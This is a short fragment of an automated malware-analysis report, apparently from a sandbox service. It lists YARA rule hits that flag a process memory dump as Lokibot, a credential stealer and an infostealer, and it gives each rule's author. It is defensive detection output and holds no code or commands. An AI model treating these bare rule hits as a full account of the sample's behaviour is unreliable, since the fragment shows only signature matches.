                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  No disassembly